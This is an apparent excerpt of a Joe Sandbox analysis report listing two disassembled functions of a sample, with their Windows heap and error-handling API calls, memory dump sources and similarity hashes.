                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00DD4925
                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00DD4936
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00DD495D
                                                                                          • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00DD4964
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorHeapLast$FreeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1234203156-0
                                                                                          • Opcode ID: 59a94b0efac121fd065f1b92a27d4c10ee671c8f933aa25781c57957424f9ede
                                                                                          • Instruction ID: 4873fbc1d4728155157e720dbe708aa04a44e3617cbd4d34bde6a05a14466e63
                                                                                          • Opcode Fuzzy Hash: 59a94b0efac121fd065f1b92a27d4c10ee671c8f933aa25781c57957424f9ede
                                                                                          • Instruction Fuzzy Hash: 2E21AE31501110EBCB11AB61DDA5ABEBB69EF91705308415BF402AB319DB71DD05DBB0
                                                                                          Function 00DD2E62 Relevance: 5.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,?,00DD4B2F,?,00000000,00000000,?,?,?,00000000,?), ref: 00DD2E80
                                                                                          • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00DD48A0,?,?,?,?,00000000), ref: 00DD2E87
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00DD4B2F,?,00000000,00000000,?,?,?,00000000,?,?,?,00DD48A0), ref: 00DD2EA5
                                                                                          • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00DD48A0,?,?,?,?,00000000), ref: 00DD2EAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$FreeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 3859560861-0
                                                                                          • Opcode ID: 64cd35d1fc3a0ab4fdab4671d7409c4ef03fcaca2dbb859d25da4489e4cac0b3
                                                                                          • Instruction ID: 0f7afe1983fd6e57a9c4d1e280c6efab0ebb5262662890106e5ff3007645e22d
                                                                                          • Opcode Fuzzy Hash: 64cd35d1fc3a0ab4fdab4671d7409c4ef03fcaca2dbb859d25da4489e4cac0b3
                                                                                          • Instruction Fuzzy Hash: 14F03C72210211AFDB249FA1E888B65BBF8FF58312F11052AF141C6250D775A995CBB0